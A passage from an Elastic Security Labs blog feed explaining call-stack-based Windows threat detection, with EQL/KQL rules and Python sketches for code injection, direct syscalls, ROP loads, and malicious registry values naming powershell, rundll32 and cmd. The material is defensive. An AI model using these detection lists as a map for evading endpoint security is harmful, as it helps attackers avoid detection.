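<p>Calling <code>function_a()</code> yields a list beginning <code>capture_callers, function_c, function_b, function_a, ...</code>, mirroring how the Windows call stacks below read from top to bottom.</p>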
<p>In Windows, when we double-click on <strong>notepad.exe</strong>, for example, the following series of functions is called:</p>
<ul>
<li>The green section is related to base thread initialization performed by the operating system and is usually identical across all operations (file, registry, process, library, etc.)</li>
<li>The red section is the user code; it is often composed of multiple modules and provides approximate details of how the process creation operation was reached</li>
<li>The blue section is the Win32 and Native API layer; this is operation-specific, including the last 2 to 3 intermediary Windows modules before forwarding the operation details for effective execution in kernel mode</li>
</ul>
<p>The following screenshot depicts the call stack for this execution chain:</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/peeling-back-the-curtain-with-call-stacks/image17.png" alt="" /></p>
<p>Here is an example of file creation using <strong>notepad.exe</strong> where we can see a similar pattern:</p>
<ul>
<li>The blue part lists the last user mode intermediary Windows APIs before forwarding the create file operation to kernel mode drivers for effective execution</li>
<li>The red section includes functions from <strong>user32.dll</strong> and <strong>notepad.exe</strong>, which indicate that this file operation was likely initiated via GUI</li>
<li>The green part represents the initial thread initialization</li>
</ul>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/peeling-back-the-curtain-with-call-stacks/image19.png" alt="" /></p>
<h2>Events Explainability</h2>
<p>Call stacks aren't only useful for finding known bad, like <a href="https://www.elastic.co/kr/security-labs/hunting-memory">unbacked memory regions</a> with RWX permissions that may be the remnants of prior code injection. They also provide very low-level visibility that often reveals greater insights than logs can otherwise provide.</p>
<p>As an example, while hunting for suspicious process executions started by <strong>WmiPrvSe.exe</strong> via WMI, you find this instance of <strong>notepad.exe</strong>:</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/peeling-back-the-curtain-with-call-stacks/image21.png" alt="" /></p>
<p>Reviewing the standard event log fields, you may assume that it was started via the <a href="https://learn.microsoft.com/en-us/windows/win32/cimwin32prov/win32-process">Win32_Process</a> class with the <strong>wmic.exe process call create notepad.exe</strong> syntax. However, the event details describe a series of modules and functions:</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/peeling-back-the-curtain-with-call-stacks/image12.png" alt="" /></p>
<p>The blue section depicts the standard intermediary <strong>CreateProcess</strong> Windows APIs. The red section is more revealing: the DLL immediately before the first call to <strong>CreateProcessW</strong> is <strong>wbemcons.dll</strong>, and inspecting its properties shows that it’s related to <a href="https://learn.microsoft.com/en-us/windows/win32/wmisdk/commandlineeventconsumer">WMI Event Consumers</a>. We can conclude that this <strong>notepad.exe</strong> instance is likely related to a WMI Event Subscription, which will require specific incident response steps to mitigate the WMI persistence mechanism.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/peeling-back-the-curtain-with-call-stacks/image22.png" alt="" /></p>
<p>Another great example is Windows scheduled tasks. When executed, they are spawned as children of the Schedule service, which runs within a <strong>svchost.exe</strong> host process. Modern Windows 11 machines may have 50 or more <strong>svchost.exe</strong> processes running. Fortunately, the Schedule service has a specific process argument, <strong>-s Schedule</strong>, which differentiates it:</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/peeling-back-the-curtain-with-call-stacks/image8.png" alt="" /></p>
<p>In older Windows versions, the Scheduled Tasks service is a member of the Network Service group and executed as a component of the <strong>netsvcs</strong> shared <strong>svchost.exe</strong> instance. Not all children of this process are necessarily scheduled tasks in these older versions:</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/peeling-back-the-curtain-with-call-stacks/image2.png" alt="" /></p>
<p>Inspecting the call stack on both versions, we can see the module that is adjacent to the <strong>CreateProcess</strong> call is the same <strong>ubpm.dll</strong> (Unified Background Process Manager DLL) executing the exported function <strong>ubpm.dll!UbpmOpenTriggerConsumer</strong>:</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/peeling-back-the-curtain-with-call-stacks/image4.png" alt="" /></p>
<p>Using the following KQL query, we can hunt for task executions on both versions:</p>
<pre><code>event.action : &quot;start&quot; and 
process.parent.name : &quot;svchost.exe&quot; and process.parent.args : netsvcs and 
process.parent.thread.Ext.call_stack_summary : *ubpm.dll* 
</code></pre>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/peeling-back-the-curtain-with-call-stacks/image18.png" alt="" /></p>
<p>Another interesting example occurs when a user double-clicks a script file from a ZIP archive that was opened using Windows Explorer. Looking at the process tree, you will see that <strong>explorer.exe</strong> is the parent and the child is a script interpreter process like <strong>wscript.exe</strong> or <strong>cmd.exe</strong>.</p>
<p>This process tree can be confused with a user double-clicking a script file from any location on the file system, which is not very suspicious. But if we inspect the call stack we can see that the parent stack is pointing to <strong>zipfld.dll</strong> (Zipped Folders Shell Extension):</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/peeling-back-the-curtain-with-call-stacks/image20.png" alt="" /></p>
<h2>Detection Examples</h2>
<p>Now that we have a better idea of how to use the call stack to better interpret events, let’s explore some advanced detection examples per event type.</p>
<h3>Process</h3>
<h4>Suspicious Process Creation via Reflection</h4>
<p><a href="https://www.deepinstinct.com/blog/dirty-vanity-a-new-approach-to-code-injection-edr-bypass">Dirty Vanity</a> is a recent code-injection technique that abuses process forking to execute shellcode within a copy of an existing process. When a process is forked, the OS makes a copy of an existing process, including its address space and any <a href="https://learn.microsoft.com/en-us/windows/win32/sysinfo/handle-inheritance">inheritable</a> handles therein.</p>
<p>When executed, Dirty Vanity will fork an instance of a targeted process (already running or a sacrificial one) and then inject into it. Process creation notification <a href="https://learn.microsoft.com/en-us/windows-hardware/drivers/ddi/ntddk/nc-ntddk-pcreate_process_notify_routine_ex">callbacks</a> won’t log forked processes because the forked process’s initial thread isn’t executed. In the case of this injection technique, however, the forked process is injected into and a thread is started, which triggers the process start event with the following call stack:</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/peeling-back-the-curtain-with-call-stacks/image6.png" alt="" /></p>
<p>We can see the calls to <strong>RtlCreateProcessReflection</strong> and <strong>RtlCloneUserProcess</strong> used to fork the process. Now we know that this is a forked process, and the next question is: is this common under normal conditions? It turns out that forking alone is fairly common and is not a strong signal of something malicious. Checking further whether forked processes perform any network connections, load DLLs, or spawn child processes revealed those behaviors to be far less common, and they made for good detections:</p>
<pre><code>// EQL detecting a forked process spawning a child process - very suspicious

process where event.action == &quot;start&quot; and

descendant of 
   [process where event.action == &quot;start&quot; and 
   _arraysearch(process.parent.thread.Ext.call_stack, $entry, 
   $entry.symbol_info: 
    (&quot;*ntdll.dll!RtlCreateProcessReflection*&quot;, 
    &quot;*ntdll.dll!RtlCloneUserProcess*&quot;))] and

not (process.executable : 
      (&quot;?:\\WINDOWS\\SysWOW64\\WerFault.exe&quot;, 
      &quot;?:\\WINDOWS\\system32\\WerFault.exe&quot;) and
     process.parent.thread.Ext.call_stack_summary : 
      &quot;*faultrep.dll|wersvc.dl*&quot;)
</code></pre>
<pre><code>// EQL detecting a forked process loading a network DLL 
//  or performs a network connection - very suspicious

sequence by process.entity_id with maxspan=1m
 [process where event.action == &quot;start&quot; and
  _arraysearch(process.parent.thread.Ext.call_stack, 
  $entry, $entry.symbol_info: 
    (&quot;*ntdll.dll!RtlCreateProcessReflection*&quot;, 
    &quot;*ntdll.dll!RtlCloneUserProcess*&quot;))]
 [any where
  (
   event.category : (&quot;network&quot;, &quot;dns&quot;) or 
   (event.category == &quot;library&quot; and 
    dll.name : (&quot;ws2_32.dll&quot;, &quot;winhttp.dll&quot;, &quot;wininet.dll&quot;))
  )]
</code></pre>
<p>Here’s an example of forking <strong>explorer.exe</strong> and executing shellcode that spawns <strong>cmd.exe</strong> from the forked <strong>explorer.exe</strong> instance:</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/peeling-back-the-curtain-with-call-stacks/image13.png" alt="" /></p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/peeling-back-the-curtain-with-call-stacks/image14.png" alt="" /></p>
<h3>Direct Syscall via Assembly Bytes</h3>
<p>The second and final example for process events is process creation via direct syscall. This directly uses the syscall instruction instead of calling the <strong>NtCreateProcess</strong> API. Adversaries may use <a href="https://www.ired.team/offensive-security/defense-evasion/using-syscalls-directly-from-visual-studio-to-bypass-avs-edrs">this method</a> to avoid security products that are reliant on usermode API hooking (which Elastic Defend is not):</p>
<pre><code>process where event.action : &quot;start&quot; and 

// EQL detecting a call stack summary not starting with ntdll.dll
// (summaries list the most recent frame first)
not process.parent.thread.Ext.call_stack_summary : &quot;ntdll.dll*&quot; and 

/* last call in the call stack contains bytes that execute a syscall
 manually using assembly &lt;mov r10,rcx, mov eax,ssn, syscall&gt; */

_arraysearch(process.parent.thread.Ext.call_stack, $entry,
 ($entry.callsite_leading_bytes : (&quot;*4c8bd1b8??????000f05&quot;, 
 &quot;*4989cab8??????000f05&quot;, &quot;*4c8bd10f05&quot;, &quot;*4989ca0f05&quot;)))
</code></pre>
<p>This example matches when the final memory region in the call stack is unbacked and contains assembly bytes that end with the syscall instruction (<strong>0F05</strong>):</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/peeling-back-the-curtain-with-call-stacks/image16.png" alt="" /></p>
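<p>The wildcard byte patterns above can be tested offline. Here is a small Python sketch (with a hypothetical <code>is_direct_syscall_stub</code> helper) that translates the EQL-style wildcard strings into regular expressions and matches them against a hex dump of a callsite's leading bytes:</p>

```python
import re

# The leading-byte patterns from the rule above, hex-encoded x64 for:
#   4c8bd1 = mov r10, rcx          b8 ?? ?? ?? 00 = mov eax, <syscall number>
#   4989ca = mov r10, rcx (alt)    0f05 = syscall
PATTERNS = ["*4c8bd1b8??????000f05", "*4989cab8??????000f05",
            "*4c8bd10f05", "*4989ca0f05"]

def to_regex(pattern):
    # Translate the EQL-style wildcards: '*' matches any prefix,
    # '?' matches a single hex nibble.
    escaped = re.escape(pattern).replace(r"\*", ".*").replace(r"\?", ".")
    return re.compile(escaped + "$", re.IGNORECASE)

def is_direct_syscall_stub(leading_bytes_hex):
    return any(to_regex(p).match(leading_bytes_hex) for p in PATTERNS)

# mov r10,rcx / mov eax,0x55 / syscall, preceded by arbitrary bytes
print(is_direct_syscall_stub("9090904c8bd1b8550000000f05"))  # True
print(is_direct_syscall_stub("4c8bd14889e5c3"))              # False
```

<p>The trailing <strong>0f05</strong> in each pattern anchors the match on the syscall instruction itself.</p>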
<h2>File</h2>
<h3>Suspicious Microsoft Office Embedded Object</h3>
<p>The following rule logic identifies suspicious file extensions written by a Microsoft Office process from an embedded OLE stream, frequently used by malicious documents to drop payloads for initial access.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/peeling-back-the-curtain-with-call-stacks/image7.png" alt="" /></p>
<pre><code>// EQL detecting file creation event with call stack indicating 
// OleSaveToStream call to save or load the embedded OLE object

file where event.action != &quot;deletion&quot; and 

process.name : (&quot;winword.exe&quot;, &quot;excel.exe&quot;, &quot;powerpnt.exe&quot;) and

_arraysearch(process.thread.Ext.call_stack, $entry, $entry.symbol_info:
 (&quot;*!OleSaveToStream*&quot;, &quot;*!OleLoad*&quot;)) and
(
 file.extension : (&quot;exe&quot;, &quot;dll&quot;, &quot;js&quot;, &quot;vbs&quot;, &quot;vbe&quot;, &quot;jse&quot;, &quot;url&quot;, 
 &quot;chm&quot;, &quot;bat&quot;, &quot;mht&quot;, &quot;hta&quot;, &quot;htm&quot;, &quot;search-ms&quot;) or

 /* PE &amp; HelpFile */
 file.Ext.header_bytes : (&quot;4d5a*&quot;, &quot;49545346*&quot;)
 )
</code></pre>
<p>Examples of matches:</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/peeling-back-the-curtain-with-call-stacks/image9.png" alt="" /></p>
<h3>Suspicious File Rename from Unbacked Memory</h3>
<p>Certain ransomware may inject into signed processes before starting their encryption routine. File rename and modification events will appear to originate from a trusted process, potentially bypassing some heuristics that exclude signed processes as presumed false positives. The following EQL query looks for renames of document files by a signed binary with a suspicious call stack:</p>
<pre><code>file where event.action : &quot;rename&quot; and 
  
process.code_signature.status : &quot;trusted&quot; and file.extension != null and 

file.Ext.original.name : (&quot;*.jpg&quot;, &quot;*.bmp&quot;, &quot;*.png&quot;, &quot;*.pdf&quot;, &quot;*.doc&quot;, 
&quot;*.docx&quot;, &quot;*.xls&quot;, &quot;*.xlsx&quot;, &quot;*.ppt&quot;, &quot;*.pptx&quot;) and

not file.extension : (&quot;tmp&quot;, &quot;~tmp&quot;, &quot;diff&quot;, &quot;gz&quot;, &quot;download&quot;, &quot;bak&quot;, 
&quot;bck&quot;, &quot;lnk&quot;, &quot;part&quot;, &quot;save&quot;, &quot;url&quot;, &quot;jpg&quot;,  &quot;bmp&quot;, &quot;png&quot;, &quot;pdf&quot;, &quot;doc&quot;, 
&quot;docx&quot;, &quot;xls&quot;, &quot;xlsx&quot;, &quot;ppt&quot;, &quot;pptx&quot;) and 

process.thread.Ext.call_stack_summary :
(&quot;ntdll.dll|kernelbase.dll|Unbacked&quot;,
 &quot;ntdll.dll|kernelbase.dll|kernel32.dll|Unbacked&quot;, 
 &quot;ntdll.dll|kernelbase.dll|Unknown|kernel32.dll|ntdll.dll&quot;, 
 &quot;ntdll.dll|kernelbase.dll|kernel32.dll|Unknown|kernel32.dll|ntdll.dll&quot;, 
 &quot;ntdll.dll|kernelbase.dll|kernel32.dll|mscorlib.ni.dll|Unbacked&quot;, 
 &quot;ntdll.dll|wow64.dll|wow64cpu.dll|wow64.dll|ntdll.dll|kernelbase.dll|Unbacked&quot;, 
 &quot;ntdll.dll|wow64.dll|wow64cpu.dll|wow64.dll|ntdll.dll|kernelbase.dll|Unbacked|kernel32.dll|ntdll.dll&quot;, 
 &quot;ntdll.dll|Unbacked&quot;, &quot;Unbacked&quot;, &quot;Unknown&quot;)
</code></pre>
<p>Here are some examples of matches where <strong>explorer.exe</strong> (Windows Explorer) is injected by the <a href="https://www.bleepingcomputer.com/news/security/knight-ransomware-distributed-in-fake-tripadvisor-complaint-emails/">KNIGHT/CYCLOPS</a> ransomware:</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/peeling-back-the-curtain-with-call-stacks/image30.png" alt="" /></p>
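<p>Stripped of the call-stack condition, the extension heuristic in the rule above can be sketched in Python. The extension lists are copied from the query; <code>suspicious_rename</code> is a hypothetical helper, not part of any Elastic API:</p>

```python
# A document renamed to an unfamiliar extension is typical of ransomware
# appending its own marker after encrypting the file.
DOC_EXTS = {"jpg", "bmp", "png", "pdf", "doc", "docx",
            "xls", "xlsx", "ppt", "pptx"}
BENIGN_NEW_EXTS = {"tmp", "~tmp", "diff", "gz", "download", "bak", "bck",
                   "lnk", "part", "save", "url"} | DOC_EXTS

def suspicious_rename(original_name, new_extension):
    # Flag only when a known document type gains an extension outside
    # the benign set (temporary files, backups, other document types).
    original_ext = original_name.rsplit(".", 1)[-1].lower()
    return original_ext in DOC_EXTS and new_extension.lower() not in BENIGN_NEW_EXTS

print(suspicious_rename("report.docx", "knight"))  # True
print(suspicious_rename("report.docx", "tmp"))     # False
```

<p>In the real rule, this extension logic only fires in combination with the trusted code signature and suspicious call-stack-summary conditions.</p>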
<h3>Executable File Dropped by an Unsigned Service DLL</h3>
<p>Certain types of malware maintain their presence by disguising themselves as Windows service DLLs. To be recognized and managed by the Service Control Manager, a service DLL must export a function named <strong>ServiceMain</strong>. The KQL query below helps identify instances where an executable file is created, and the call stack includes the <strong>ServiceMain</strong> function.</p>
<pre><code>event.category : file and 
 file.Ext.header_bytes : 4d5a* and process.name : svchost.exe and 
 process.thread.Ext.call_stack.symbol_info : *!ServiceMain*
</code></pre>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/peeling-back-the-curtain-with-call-stacks/image3.png" alt="" /></p>
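<p>The two signals the hunt combines are simple to express. Below is a Python sketch with a hypothetical <code>matches_hunt</code> helper and simplified event field shapes:</p>

```python
# Sketch of the hunt above: the dropped file starts with the PE magic "MZ"
# (header bytes 4d5a), and a ServiceMain frame appears in the writing
# thread's call stack.
def matches_hunt(header_bytes_hex, call_stack_symbols):
    is_pe = header_bytes_hex.lower().startswith("4d5a")
    via_service_main = any("!ServiceMain" in symbol for symbol in call_stack_symbols)
    return is_pe and via_service_main

print(matches_hunt("4d5a90000300", ["evil.dll!ServiceMain+0x12",
                                    "sechost.dll!ScSvcctrlThreadA+0x20"]))  # True
print(matches_hunt("504b0304", ["evil.dll!ServiceMain+0x12"]))  # False (ZIP, not PE)
```

<p>Either signal alone is noisy; together they tie an executable drop directly to service DLL code.</p>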
<h2>Library</h2>
<h3>Unsigned Print Monitor Driver Loaded</h3>
<p>The following EQL query identifies the loading of an unsigned library by the print spooler service where the call stack indicates the load is coming from <strong>SplAddMonitor</strong>. Adversaries may use <a href="https://attack.mitre.org/techniques/T1547/010/">port monitors</a> to run an adversary-supplied DLL during system boot for persistence or privilege escalation.</p>
<pre><code>library where
process.executable : (&quot;?:\\Windows\\System32\\spoolsv.exe&quot;, 
&quot;?:\\Windows\\SysWOW64\\spoolsv.exe&quot;) and not dll.code_signature.status : 
&quot;trusted&quot; and _arraysearch(process.thread.Ext.call_stack, $entry, 
$entry.symbol_info: &quot;*localspl.dll!SplAddMonitor*&quot;)
</code></pre>
<p>Example of match:</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/peeling-back-the-curtain-with-call-stacks/image5.png" alt="" /></p>
<h3>Potential Library Load via ROP Gadgets</h3>
<p>This EQL rule identifies the loading of a library from unusual <strong>win32u</strong> or <strong>ntdll</strong> offsets. This may indicate an attempt to bypass API monitoring using Return Oriented Programming (ROP) assembly gadgets to execute a syscall instruction from a trusted module.</p>
<pre><code>library where
// adversaries try to use ROP gadgets from ntdll.dll or win32u.dll 
// to construct a normal-looking call stack

process.thread.Ext.call_stack_summary : (&quot;ntdll.dll|*&quot;, &quot;win32u.dll|*&quot;) and 

// excluding normal Library Load APIs - LdrLoadDll and NtMapViewOfSection
not _arraysearch(process.thread.Ext.call_stack, $entry, 
 $entry.symbol_info: (&quot;*ntdll.dll!Ldr*&quot;, 
 &quot;*KernelBase.dll!LoadLibrary*&quot;, &quot;*ntdll.dll!*MapViewOfSection*&quot;))
</code></pre>
<p>This example matches when <a href="https://www.kitploit.com/2023/06/atomldr-dll-loader-with-advanced.html">AtomLdr</a> loads a DLL using ROP gadgets from <strong>win32u.dll</strong> instead of using <strong>ntdll</strong>’s load library APIs (<strong>LdrLoadDll</strong> and <strong>NtMapViewOfSection</strong>).</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/peeling-back-the-curtain-with-call-stacks/image1.png" alt="" /></p>
<h3>Evasion via LdrpKernel32 Overwrite</h3>
<p>The <a href="https://github.com/rbmm/LdrpKernel32DllName">LdrpKernel32</a> evasion is an interesting technique to hijack the early execution of a process during the bootstrap phase by overwriting the bootstrap DLL name referenced in <strong>ntdll.dll</strong> memory, forcing the process to load a malicious DLL.</p>
<pre><code>library where 
 
// BaseThreadInitThunk must be exported by the rogue bootstrap DLL
 _arraysearch(process.thread.Ext.call_stack, $entry, $entry.symbol_info :
  &quot;*!BaseThreadInitThunk*&quot;) and

// excluding kernel32.dll, which normally exports BaseThreadInitThunk
not _arraysearch(process.thread.Ext.call_stack, $entry, $entry.symbol_info :
 (&quot;?:\\Windows\\System32\\kernel32.dll!BaseThreadInitThunk*&quot;, 
 &quot;?:\\Windows\\SysWOW64\\kernel32.dll!BaseThreadInitThunk*&quot;, 
 &quot;?:\\Windows\\WinSxS\\*\\kernel32.dll!BaseThreadInitThunk*&quot;, 
 &quot;?:\\Windows\\WinSxS\\Temp\\PendingDeletes\\*!BaseThreadInitThunk*&quot;, 
 &quot;\\Device\\*\\Windows\\*\\kernel32.dll!BaseThreadInitThunk*&quot;))
</code></pre>
<p>Example of match:
<img src="https://www.elastic.co/kr/security-labs/assets/images/peeling-back-the-curtain-with-call-stacks/image15.png" alt="" /></p>
<h2>Suspicious Remote Registry Modification</h2>
<p>Similar to the scheduled task example, the Remote Registry service is hosted in <strong>svchost.exe</strong>. We can use the call stack to attribute registry modifications to the Remote Registry service, and alert when the modified value points to an executable or script file. This may indicate an attempt to move laterally via remote configuration changes.</p>
<pre><code>registry where 

event.action == &quot;modification&quot; and 

user.id : (&quot;S-1-5-21*&quot;, &quot;S-1-12-*&quot;) and 

 process.name : &quot;svchost.exe&quot; and 

// The regsvc.dll module in the call stack indicates that this is indeed the 
// svchost.exe instance hosting the Remote Registry service

process.thread.Ext.call_stack_summary : &quot;*regsvc.dll|rpcrt4.dll*&quot; and

 (
  // suspicious registry values
  registry.data.strings : (&quot;*:\\*\\*&quot;, &quot;*.exe*&quot;, &quot;*.dll*&quot;, &quot;*rundll32*&quot;, 
  &quot;*powershell*&quot;, &quot;*http*&quot;, &quot;* /c *&quot;, &quot;*COMSPEC*&quot;, &quot;\\\\*.*&quot;) or
  
  // suspicious keys like Services, Run key and COM
  registry.path :
         (&quot;HKLM\\SYSTEM\\ControlSet*\\Services\\*\\ServiceDLL&quot;,
          &quot;HKLM\\SYSTEM\\ControlSet*\\Services\\*\\ImagePath&quot;,
          &quot;HKEY_USERS\\*Classes\\*\\InprocServer32\\&quot;,
          &quot;HKEY_USERS\\*Classes\\*\\LocalServer32\\&quot;,
          &quot;H*\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\*&quot;) or
  
  // potential attempt to remotely disable a service 
  (registry.value : &quot;Start&quot; and registry.data.strings : &quot;4&quot;)
  )
</code></pre>
<p>This example matches when the Run key registry value is modified remotely via the Remote Registry service:</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/peeling-back-the-curtain-with-call-stacks/image11.png" alt="" /></p>
<h2>Conclusion</h2>
<p>As we’ve demonstrated, call stacks are useful not only for finding known bad patterns, but also for reducing ambiguity in standard EDR events and easing behavior interpretation. The examples provided here represent just a small portion of the detection possibilities achievable by applying this enhanced enrichment to the same event data.</p>
]]></content:encoded>
            <category>security-labs</category>
            <enclosure url="https://www.elastic.co/kr/security-labs/assets/images/peeling-back-the-curtain-with-call-stacks/photo-edited-10@2x.jpg" length="0" type="image/jpg"/>
        </item>
        <item>
            <title><![CDATA[Upping the Ante: Detecting In-Memory Threats with Kernel Call Stacks]]></title>
            <link>https://www.elastic.co/kr/security-labs/upping-the-ante-detecting-in-memory-threats-with-kernel-call-stacks</link>
            <guid>upping-the-ante-detecting-in-memory-threats-with-kernel-call-stacks</guid>
            <pubDate>Wed, 31 May 2023 00:00:00 GMT</pubDate>
            <description><![CDATA[We aim to out-innovate adversaries and maintain protections against the cutting edge of attacker tradecraft. With Elastic Security 8.8, we added new kernel call stack based detections which provide us with improved efficacy against in-memory threats.]]></description>
            <content:encoded><![CDATA[<h2>Intro</h2>
<p>Elastic Security for endpoint, with its roots in Endgame, has long led the industry in in-memory threat detection. We <a href="https://www.elastic.co/kr/security-labs/hunting-memory">pioneered</a> and patented many detection technologies such as kernel <a href="https://image-ppubs.uspto.gov/dirsearch-public/print/downloadPdf/20170329973">thread start</a> preventions, call stack <a href="https://image-ppubs.uspto.gov/dirsearch-public/print/downloadPdf/11151247">anomaly hunting</a>, and <a href="https://image-ppubs.uspto.gov/dirsearch-public/print/downloadPdf/11151251">module stomping</a> discovery. However, adversaries continue to innovate and evade detections. For example, in response to our improved <a href="https://www.elastic.co/kr/blog/detecting-cobalt-strike-with-memory-signatures">memory signature</a> protection, adversaries developed a flurry of new <a href="https://www.cobaltstrike.com/blog/cobalt-strike-and-yara-can-i-have-your-signature/">sleep based</a> evasions. We aim to out-innovate adversaries and maintain protections against the cutting edge of attacker tradecraft. With Elastic Security 8.8, we added new kernel call stack based detections which provide us with improved efficacy against in-memory threats.</p>
<p>Before we get started, it's important to know what call stacks are and why they’re valuable for detection engineering. A <a href="https://en.wikipedia.org/wiki/Call_stack">call stack</a> is the ordered sequence of functions that are executed to achieve a behavior of a program. It shows in detail which functions (and their associated modules) were executed to lead to a behavior like a new file or process being created. Knowing a behavior’s call stack, we can build detections with detailed contextual information about what a program is doing and how it’s doing it.</p>
<h2>Deep Visibility</h2>
<p>The new call stack based detection capability leverages our existing deep in-line kernel visibility for the most common system behaviors (process, file, registry, library, etc). With each event, we capture the call stack for the activity. This is later enriched with module information, symbols, and evidence of suspicious activity. This gives us <a href="https://learn.microsoft.com/en-us/sysinternals/downloads/procmon">procmon</a>-like visibility in real-time, powering advanced preventions for in-memory tradecraft.</p>
<p>Process creation call stack fields: <img src="https://www.elastic.co/kr/security-labs/assets/images/upping-the-ante-detecting-in-memory-threats-with-kernel-call-stacks/image12.jpg" alt="" /></p>
<p>File, registry and library call stack fields: <img src="https://www.elastic.co/kr/security-labs/assets/images/upping-the-ante-detecting-in-memory-threats-with-kernel-call-stacks/image8.jpg" alt="" /></p>
<h2>New Rules</h2>
<p>Additional visibility wouldn’t raise the bar unless we could pair it with tuned, high-confidence preventions. In 8.8, behavior protection comes out of the box with 30+ rules to provide us with high efficacy against cutting-edge attacker techniques such as:</p>
<ul>
<li>Direct syscalls</li>
<li>Callback-based evasion</li>
<li>Module Stomping</li>
<li>Library loading from unbacked region</li>
<li>Process created from unbacked region</li>
<li>Many more</li>
</ul>
<p>Call stacks are a powerful data source that can be used to improve protection against non-memory-based threats as well. For example, the following EQL queries look for the creation of a child process or an executable file extension from an Office process with a call stack containing <code>VBE7.dll</code> (a strong sign of the presence of a macro-enabled document). This increases the signal and coverage of the rule logic while reducing the necessary tuning efforts compared to just process or file creation events with no call stack information:</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/upping-the-ante-detecting-in-memory-threats-with-kernel-call-stacks/image29.jpg" alt="" /></p>
<p>Below are some examples of matches where macro-enabled malicious Excel and Word documents spawn a child process and the call stack refers to <code>vbe7.dll</code>:</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/upping-the-ante-detecting-in-memory-threats-with-kernel-call-stacks/image9.jpg" alt="" /></p>
<p>Here, we can see a malicious XLL file opened via Excel spawning a legitimate <code>browser_broker.exe</code> to inject into. The parent call stack indicates that the process creation call is coming from the <a href="https://learn.microsoft.com/en-us/office/client-developer/excel/xlautoopen"><code>xlAutoOpen</code></a> function:</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/upping-the-ante-detecting-in-memory-threats-with-kernel-call-stacks/image11.jpg" alt="" /></p>
<p>The same enrichment is also valuable in library load and registry events. Below is an example of loading the Microsoft Common Language Runtime <code>CLR.DLL</code> module from a suspicious call stack (unbacked memory region with RWX permissions) using the <a href="https://github.com/BishopFox/sliver/wiki/Using-3rd-party-tools">Sliver execute-assembly</a> command to load external .NET assemblies:</p>
<pre><code>library where dll.name : &quot;clr.dll&quot; and
process.thread.Ext.call_stack_summary : &quot;*mscoreei.dll|Unbacked*&quot;
</code></pre>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/upping-the-ante-detecting-in-memory-threats-with-kernel-call-stacks/image4.jpg" alt="" /></p>
<p>Hunting for suspicious modification of certain registry keys, such as the Run key used for persistence, tends to be noisy because such modifications are very common in legitimate software. But if we add the call stack signal to the logic, the suspicion level is significantly increased:</p>
<pre><code>registry where 
 registry.path : &quot;H*\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\*&quot;
// the creating thread's stack contains frames pointing outside any known executable image
 and process.thread.Ext.call_stack_contains_unbacked == true
</code></pre>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/upping-the-ante-detecting-in-memory-threats-with-kernel-call-stacks/image2.jpg" alt="" /></p>
<p>Another “fun” example is the use of the call stack information to detect rogue instances of core system processes that normally have very specific functionality. By signaturing their normal call stacks, we can easily identify outliers. For example, <code>WerFault.exe</code> and <code>wermgr.exe</code> are among the most attractive targets for masquerading:</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/upping-the-ante-detecting-in-memory-threats-with-kernel-call-stacks/image30.jpg" alt="" /></p>
<p>Examples of matches:</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/upping-the-ante-detecting-in-memory-threats-with-kernel-call-stacks/image9.jpg" alt="" /></p>
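<p>Conceptually, signaturing normal call stacks reduces to an allowlist lookup. Below is a Python sketch with made-up baseline summaries; real baselines would be derived from fleet telemetry, and <code>is_rogue</code> is a hypothetical helper:</p>

```python
# Hypothetical baseline of call-stack summaries a core system process
# normally produces at creation time. The entries are placeholders,
# not real WerFault.exe baselines.
KNOWN_GOOD_SUMMARIES = {
    "werfault.exe": {
        "ntdll.dll|kernelbase.dll|werfault.exe|kernel32.dll|ntdll.dll",
    },
}

def is_rogue(process_name, call_stack_summary):
    # Flag a process whose creation call stack is not in its known baseline.
    baseline = KNOWN_GOOD_SUMMARIES.get(process_name.lower())
    if baseline is None:
        return False  # no baseline for this process, nothing to compare
    return call_stack_summary.lower() not in baseline

# An unbacked frame deviates from the baseline: likely injected/masqueraded
print(is_rogue("WerFault.exe", "ntdll.dll|kernelbase.dll|Unbacked"))  # True
```

<p>Because core system processes have very stable startup paths, even a small allowlist like this yields high-signal outliers.</p>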
<p>Apart from the use of call stack data for finding suspicious behaviors, it’s also useful when it comes to excluding false positives from behavior detections in a more granular way. This also helps reduce evasion opportunities.</p>
<p>A good example is a detection rule looking for unusual Microsoft Office child processes. This rule is used to <a href="https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/initial_access_microsoft_office_fetching_remote_content.toml#L26">exclude</a> <code>splwow64.exe</code>, which can be legitimately spawned by printing activity. Excluding it by <code>process.executable</code> alone creates an evasion opportunity via process hollowing or injection, which can make the process tree look normal. We can now mitigate this evasion by requiring such process creations to come from <code>winspool.drv!OpenPrinter</code>:</p>
<pre><code>process where event.action == &quot;start&quot; and
